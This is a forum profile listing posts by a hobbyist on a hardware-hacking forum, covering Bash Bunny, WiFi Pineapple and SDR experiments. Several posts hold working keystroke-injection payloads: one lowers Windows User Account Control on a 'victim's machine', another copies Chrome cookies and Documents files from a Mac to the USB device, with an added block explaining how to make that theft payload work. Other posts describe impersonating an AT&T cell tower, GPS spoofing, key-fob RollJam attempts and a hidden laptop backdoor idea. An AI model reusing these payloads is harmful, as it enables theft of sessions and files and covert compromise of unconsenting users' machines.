
Onus

Active Members
  • Posts: 115
  • Joined
  • Last visited
  • Days Won: 1

Everything posted by Onus

  1. Onus

    Captive Portal

    I'll look into it. Yeah, I actually got it to work on my Windows machine once or twice when disconnecting from my Wi-Fi network, even after it reconnected, but then it went back to normal internet. I am wondering if it's possible to make a captive portal run on a locked machine, much like QuickCreds. I'm totally new to Responder, so I need to look at that too. I was thinking of rerouting with Responder to the /var/www of the Bunny; I don't know if that is possible.
  2. Onus

    Captive Portal

    Has anyone got the captive portal working? I pulled the latest and slapped it on switch 1. It starts to work: it shows up correctly and even opens a browser, but to the user's home page, not the captive portal. EDIT: I should note that it doesn't prevent me from accessing the web via my Wi-Fi, and it shows that it is connected to the Ethernet adapter as well, but with no internet. Windows 10 target.
  3. I'm noticing that a script that is set to ATTACKMODE HID STORAGE has significant consequences for the speed of your script. I have found that on some Windows machines, the fact that storage is enabled can open a delayed Explorer window, which may gain focus in the middle of your quacking. Thus I end up putting a 3 second delay before any initial keystrokes, in a sort of cross-my-fingers manner. I realize we need it to mount before we do any real looting anyway, but there are plenty of things we could do in the meantime, like de-escalating the User Account Control settings. Anyway, I'm wondering if others are coming up with creative ways around this, or are even consistently experiencing it.
  4. Sorry, my bad on the attack mode; I missed it in my copy/paste. 2: This attack mode was both HID and Storage. The initial delay is because I found that on some Windows machines the storage mode will take a bit and open an Explorer window; to make sure that window doesn't take focus in the middle of my script, I wait before typing anything. 1 & 3: The LED stuff is preference, obviously.
  5. I just refactored an old Ducky script I wrote for lowering the User Account Control settings on a victim's machine. It's a bit of a dirty way to go about it, but it seems to work on a Windows 10 machine no matter what the user's current account settings are. It's not really stand-alone, but more of a header for more complicated attacks.

    # Bash Bunny payload.txt ("Q" is the short form of QUACK)
    ATTACKMODE HID STORAGE   # omitted from the original paste; see the reply above
    LED R G 300
    Q DELAY 3000             # wait for the storage mount / stray Explorer window
    LED B 100
    Q DELAY 100
    # Downgrade user account security to NEVER
    # Minimize all windows
    Q GUI d
    Q GUI r
    Q DELAY 300
    Q STRING useraccountcontrolsettings
    Q ENTER
    # Deal with a potential first prompt if security is too high, in a way that won't mess with other possible outcomes
    Q DELAY 300
    Q DOWNARROW
    Q UPARROW
    Q DELAY 300
    Q ENTER
    # Lower the bar (slider down to "Never notify")
    Q DELAY 500
    Q DOWNARROW
    Q DOWNARROW
    Q DOWNARROW
    Q DOWNARROW
    Q DELAY 300
    Q TAB
    Q ENTER
    Q DELAY 500
    # Deal with a potential final prompt if the user had a high level
    Q LEFTARROW
    Q ENTER
    Q DELAY 500

    Just thought I'd share, get thoughts, and maybe save someone some time dancing around all the possible keyboard combinations to deal with for a given user's settings. Windows 7+.
  6. Sorry, on mine it's "files". I changed the name, as I'm storing more than xls files. But yes, the folder exists and has files, but $files keeps saying 0.
  7. I just tried removing the kill terminal command so that I can use the terminal to log $files, and edited your script above to look like this after the sync call:

    # Sync filesystem
    sync
    # NB: /Volumes/BashBunny is the Mac's mount of the Bunny's USB disk; on the Bunny itself the udisk is mounted at /root/udisk
    files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ | grep -v / | wc -l)
    QUACK STRING $files
    QUACK ENTER
    if [ "$files" != "0" ]      # original was missing the space before "]", which makes test fail with "missing ]"
    then
        # Got files
        LED G
    else
        LED R # No files
    fi

    I am perplexed why $files keeps reading as 0 even though I have copied 16 files. If I run the same line in the terminal myself:

    ls /Volumes/BashBunny/loot/MacLoot/files/ | grep -v / | wc -l

    I get 16, but the script keeps returning 0. It's stupid bells and whistles, but damn it, I want to know.
  8. I gathered that. I mean, the old file didn't sync the file system and always went LED red even when there were files; would this fix that?
  9. Wow, this is almost identical to the changes I have been making since my last comment. Awesome (high five). Is the lack of sync why I was never getting a success? If sync fixes this, it might be nice to add back in the logic for the LED at the end indicating whether the files were found/copied.
  10. Onus

    Smart TVs

    Wondering if we know of any TVs with USB inputs that can be played with. I know an Android phone, for instance, allows you to plug in a USB keyboard for Ducky-style attacks. I was going to play with USB Ethernet adapters on an Android when I get home from work, but I'm wondering if there is already someone on here who has tried such with smart TVs.
  11. "cd ENTER" works too. I was just playing around with the MacInfoGrabber payload by kmakblob, and in order to get it to work I had to change it.

    Original:

    LED R
    ATTACKMODE HID STORAGE
    LOOTDIR=/loot/MacLoot
    mkdir -p $LOOTDIR
    QUACK GUI SPACE
    QUACK DELAY 1000
    QUACK STRING terminal
    QUACK ENTER
    QUACK DELAY 8000
    QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
    QUACK ENTER
    QUACK DELAY 500
    QUACK STRING cat ~/Library/Application\ Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
    QUACK ENTER
    QUACK DELAY 1000
    QUACK STRING cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/
    QUACK ENTER
    QUACK DELAY 1000
    QUACK GUI q
    QUACK DELAY 500
    QUACK ENTER
    # Green LED for finished
    LED G
    files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
    files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
    if [ "$files" != "0" -o "$files2" != "0"]
    then
        # Got spreadsheet files
        LED R B
    else
        LED R # No spread sheets
    fi

    Post fiddles: I had to escape spaces, and even escape the escape of the space, as well as other special chars, to get it to work. I didn't try escaping ~.

    LED R G 100
    ATTACKMODE HID STORAGE
    LOOTDIR=loot/MacLoot
    mkdir -p $LOOTDIR
    QUACK GUI SPACE
    QUACK DELAY 1000
    QUACK STRING terminal
    QUACK ENTER
    QUACK DELAY 1000
    QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
    QUACK ENTER
    QUACK DELAY 1000
    QUACK STRING cd
    QUACK ENTER
    # double backslash: the Bunny's shell eats one, the target's shell gets "Application\ Support"
    QUACK STRING cd Library/Application\\ Support/Google/Chrome/Default/
    QUACK ENTER
    QUACK DELAY 1000
    # "\>" so the Bunny's shell does not treat ">" as a redirection of QUACK itself
    QUACK STRING cat Cookies \> /Volumes/BashBunny/$LOOTDIR/chromecookies.db
    QUACK DELAY 1000
    QUACK ENTER
    QUACK STRING cd
    QUACK ENTER
    QUACK DELAY 1000
    QUACK ENTER
    QUACK STRING cd Documents
    QUACK ENTER
    QUACK STRING cp *.xlsx *.xls *.pdf *.jpg /Volumes/BashBunny/$LOOTDIR/files/
    #QUACK STRING cp -R Documents/ /Volumes/BashBunny/$LOOTDIR/files/
    QUACK ENTER
    QUACK DELAY 1000
    QUACK STRING cd
    #QUACK GUI q
    QUACK DELAY 2000
    QUACK ENTER
    # Green LED for finished
    LED G
    # NB: /Volumes/BashBunny only exists on the Mac; on the Bunny the udisk is mounted at /root/udisk
    files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ | grep -v / | wc -l)
    QUACK STRING $files
    if [ "$files" != "0" ]      # straight quotes and a space before "]" (the paste had curly quotes and no space)
    then
        # Got files
        LED G
    else
        LED R # No files
    fi
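Both Bash Bunny problems in posts 7 and 11 above have the same root cause: payload.txt is a bash script running on the Bunny, so every QUACK STRING line is parsed by the Bunny's shell (redirections, `&&`, globs, `~`, backslashes) before a single keystroke reaches the target, and every path in the payload is a Bunny-side path, where the USB disk is mounted at /root/udisk rather than at the Mac's /Volumes/BashBunny. The block below is an added example, not code from the original posts or from Hak5's firmware: its QUACK is a stand-in that records what the real QUACK would have typed, count_loot takes its directory as an argument so it can be run on any machine, and the loot directory it creates is constructed test data. One caveat it cannot remove: while the target still has the udisk mounted, the Bunny's own view of that block device can lag behind the target's cached writes, so sync on the Bunny is not a substitute for the target ejecting the disk.

```shell
#!/bin/bash
# Added example (not from the original thread or from Hak5): why QUACK STRING
# lines need quoting, and how to count loot on the Bunny side of the udisk.

TYPED=""                            # what the stand-in keyboard would have sent, '|'-separated
QUACK() {
    # The real QUACK types its arguments; by the time it runs, bash on the
    # Bunny has already done redirection parsing, word splitting and globbing.
    TYPED="${TYPED}${TYPED:+|}$*"
}

# Unquoted, as in the original payload: bash redirects QUACK's own stdout to
# /dev/null and runs "true" as a second command, so the target only ever
# receives "cat Cookies" and "cd Documents".
unquoted_demo() {
    TYPED=""
    QUACK STRING cat Cookies > /dev/null
    QUACK STRING cd Documents && true
    printf '%s' "$TYPED"
}

# Double-quoted: ">", "&&", "*" and "~" reach the target untouched while
# $LOOTDIR still expands on the Bunny, so no backslash escaping is needed.
quoted_demo() {
    LOOTDIR=loot/MacLoot
    TYPED=""
    QUACK STRING "cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db"
    QUACK STRING "cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/"
    printf '%s' "$TYPED"
}

# Count the regular files the target copied, reading a Bunny-side path such as
# /root/udisk/loot/MacLoot/files.  Prints the count; prints "missing" and
# returns 1 when the directory does not exist, so a wrong path (for example the
# Mac's /Volumes/BashBunny/...) is no longer silently reported as "0 files".
count_loot() {
    dir="$1"
    sync                                 # flush the Bunny's own pending writes
    if [ ! -d "$dir" ]; then
        echo missing
        return 1
    fi
    find "$dir" -maxdepth 1 -type f | wc -l | tr -d ' '
}

# Stand-alone demo with a constructed loot directory (not real loot).
demo_main() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/loot/MacLoot/files"
    for f in a.xlsx b.pdf c.jpg; do : > "$tmp/loot/MacLoot/files/$f"; done
    echo "unquoted typed: $(unquoted_demo)"
    echo "quoted typed:   $(quoted_demo)"
    echo "files on Mac path:   $(count_loot /Volumes/BashBunny/loot/MacLoot/files || true)"
    echo "files on Bunny path: $(count_loot "$tmp/loot/MacLoot/files")"
    rm -rf "$tmp"
}
```

In a real payload the LED logic from the posts becomes `if [ "$(count_loot /root/udisk/loot/MacLoot/files)" != "0" ]; then LED G; else LED R; fi`, and every QUACK STRING that contains a redirection, `&&`, a glob or a space in a path is wrapped in double quotes instead of backslash-escaped.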
  12. Is there a way to specifically make the Bash Bunny HID look like an Apple keyboard, to bypass Keyboard Setup Assistant?
  13. I was playing with the same git repo, and was hoping you could explain to me what the broadcast ephemeris is exactly. I am using the one that came with the repo, brdc3540.14n, with pretty good success. What's the difference with the file you are using, why did you use it, and what is its purpose? Sorry, I'm a noob James Bond villain. P.S. I'm using a bladeRF x40. Onus
  14. :) Fun!!! Pirate TV, old school. <3 I recently purchased a bladeRF; going to have to try this. Have you seen this video: I have been playing with YateBTS, which is also very fun (in a lead box, of course!).
  15. Onus

    @Snubs, for Xmas I got myself a shiny new bladeRF x40. YAY! Knowing your love for all things SDR, I wanted to share with you a synopsis of my adventures with the bladeRF. I have set up a Raspberry Pi with YateBTS and gps-sdr-sim: https://github.com/osqzss/gps-sdr-sim

    I am now able to run my own GSM BTS, or spoof a GPS satellite that tells nearby devices they are actually at the Kremlin. Fun.

    YateBTS obviously really caught my interest, as I quickly discovered after buying a pack of $1 SIM cards at Best Buy and putting them in a couple of unlocked devices: I was able to get the AT&T cards to automatically connect to my BTS using MCC 310 and MNC 410 in combination, to make my BTS appear to be an AT&T tower. (No worries, as I did this in a lead box to prevent my signal from leaking to the real world; wouldn't want to interfere with the outside world.) I was also able to get T-Mobile cards to connect by manually forcing them, but I suppose I could find the MCC and MNC for them as well and get an auto-connect.

    Anyway, YateBTS is set up to automatically send a greeting SMS to phones that connect, which I of course altered to say "Emergency Alert: Someone has farted". But it got me thinking: if someone like me, with little to no real knowledge around RF, was able to do this for under $500 and a 12 hour investment, why is GSM still being used? It seems like anyone could build an IMSI catcher or StingRay. One could potentially go into a public venue with bad cell reception and start sending "greeting messages" to all the GSM phones with roaming enabled, creating a localized hysteria of "wait, who farted?!?" Now of course my curious mind is wondering how secure the Emergency Broadcast system is as well: https://en.wikipedia.org/wiki/Cell_Broadcast

    I would love to see you do a segment on this.

    Onus

  16. For me this was a security setting on my router, exactly what @kevvyg said. I, like an idiot, have an Xfinity router; I had to set the firewall settings to LOW and then I could update.
  17. Ha, I have thought about opening up an old laptop and putting in a Pi Zero or something as a built-in backdoor that would exist even if they formatted the PC and installed a new OS. Another thought was to install a Pi in my car that I could SSH into and start/stop a jammer of my own. Still playing with a RollJam for FSK; I think the way to do it might be to jam on ASK at, say, 43390000 and then on the second YARD Stick listen at 2FSK 433920000. Thoughts? I'm very new to SDR and the learning curve is quite steep. Onus
  18. I recently tried to do a RollJam on my car as a proof of concept, using two YARD Stick Ones, one to jam and one to replay, but my car uses FSK, not ASK, and I can't seem to get a RollJam to work. I can certainly jam my car so that it can't get the key fob's packet, but I can't seem to properly capture the packet / filter out the jam signal. I'll check all the links above tonight.
  19. Hi all. I recently purchased both a YARD Stick and an RTL-SDR. I was going to start writing my own Python script that allows me to quickly input which SDR device to turn on, what frequency to operate at and what mode. My first question is around setting the index of devices: how can I get a list of SDR devices plugged in and their index? My other question is: what are the accepted constants for setting the modulation type with rfcat? Onus
  20. I don't know about that technique, but would that cause my remote key to be out of sync? It seems to me that since my key remote wouldn't lock until I hit unlock, that indicates the PIN was probably incremented and my key was behind, thus out of sync. Does that make sense?
  21. I personally have not dabbled with RF hacking, so please forgive any ignorance that reveals itself with this post. I recently bought a 2016 Honda Civic. I live in a city neighborhood and park it on the one-way street that I live on. Like most cars, it has a key that also allows for remote locking / arming of the alarm, unlocking, and opening the trunk. Anyway, a few weeks into buying the car I started noticing my trunk would be open in the morning. At first I figured I must have accidentally hit the trunk button on the key, and started being much more careful about where I put my keys down. But it kept happening, always overnight and on my street. It was not happening when I stayed over at my girlfriend's for weeks at a time, or anywhere else; just when I parked it on my street. The other night 15 of my neighbors' cars on my street were all broken into, with their glove compartments rifled through. 2 cars were flat out stolen, and not a single alarm had gone off. None of the cars showed evidence of forced entry; my car was one of them. My car was parked right outside my bedroom window and I know I would have heard the alarm. The interesting thing to me was that after I heard about the break-ins and rushed to check my car, I first tried clicking the lock/engage alarm button on my key, only to find my car was not responding to it. I found my car unlocked, with no evidence of tampering. The key fob eventually started working again, only after I tried unlocking it first. It was as if the key fob was out of sync and the rolling PIN was off or something. Do you folks think my street was attacked with an SDR attack? Honda told me that my battery might be low; trust me, it's not. I tested the battery, and everything works now. I am almost certain it wasn't working because it somehow fell out of sync. Also, I would love some clever ideas on how to fuck with these petty thieves should they do it again. #karateForDefence
  22. I have been playing with the Pineapple for a few months now and recently did a factory reset. I noticed that even though I only have 3 SSIDs in my pool, and they were all added manually after my last reset, and I'm not logging probes or capturing SSIDs to my pool, PineAP still seems to be broadcasting just about anything anyone around me is probing for. I am trying to be as stealthy as can be, as I am actually just playing with it and not trying to grab a bunch of strangers' associations, but everyone around me is seeing every imaginable SSID when I power on. Is Karma running? Is there a way to stop this and ONLY broadcast what's in my pool? Side note: I have done so many resets because if my pool gets large the Pineapple doesn't seem to allow me to clear the pool. I click clear, and it clears for a second, but then all the gazillion SSIDs that were there just come back, unless I reset.
  23. I have had the Pineapple up and running for a few months now. It's been great, but all of a sudden I can't seem to set up the internet connection on it. I have even tried resetting the Pineapple, but to no avail.

    IFCONFIG

    root@kali2:~# ifconfig
    eth0      Link encap:Ethernet  HWaddr 54:ee:75:43:38:4c
              UP BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

    eth1      Link encap:Ethernet  HWaddr 00:c0:ca:8b:3c:8d
              inet addr:172.16.42.195  Bcast:172.16.42.255  Mask:255.255.255.0
              inet6 addr: fe80::2c0:caff:fe8b:3c8d/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:3095 errors:0 dropped:0 overruns:0 frame:0
              TX packets:2986 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:1842286 (1.7 MiB)  TX bytes:694007 (677.7 KiB)

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:65536  Metric:1
              RX packets:3053 errors:0 dropped:0 overruns:0 frame:0
              TX packets:3053 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:236400 (230.8 KiB)  TX bytes:236400 (230.8 KiB)

    wlan0     Link encap:Ethernet  HWaddr ac:d1:b8:11:04:6f
              inet addr:192.168.1.19  Bcast:192.168.1.255  Mask:255.255.255.0
              inet6 addr: fe80::aed1:b8ff:fe11:46f/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:19110 errors:0 dropped:0 overruns:0 frame:0
              TX packets:20149 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:11734512 (11.1 MiB)  TX bytes:1922209 (1.8 MiB)

    WP6.sh

    WiFi Pineapple Netmask [255.255.255.0]:
    WiFi Pineapple Network [172.16.42.0/24]:
    Host Interface to WiFi Pineapple [eth1]:
    Host Interface to Internet [wlan0]:
    Internet Gateway [172.16.42.1]: 192.168.1.1
    IP Address of Host [172.16.42.42]: 172.16.42.195
    IP Address of WiFi Pineapple [172.16.42.1]:
    Save settings for next session [Y/n]? Y
    Settings saved.
    Connect now [Y/n]? Y

          _ .     ___          \||/        Internet: 192.168.1.1 - wlan0
         ( _ )_   <-->  [___]  <-->  ,<><>,    Computer: 172.16.42.195
       (_  _(_ ,)       \___\        '<><>'    Pineapple: 172.16.42.0/24 - eth1

    Browse to http://172.16.42.1:1471

    ROUTE

    root@kali2:~# route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0
    172.16.42.0     *               255.255.255.0   U     0      0        0 eth1
    192.168.1.0     *               255.255.255.0   U     0      0        0 wlan0

    I have tried this several times with several different networks on my wlan0. I am super frustrated; can someone please help? Running Kali 2.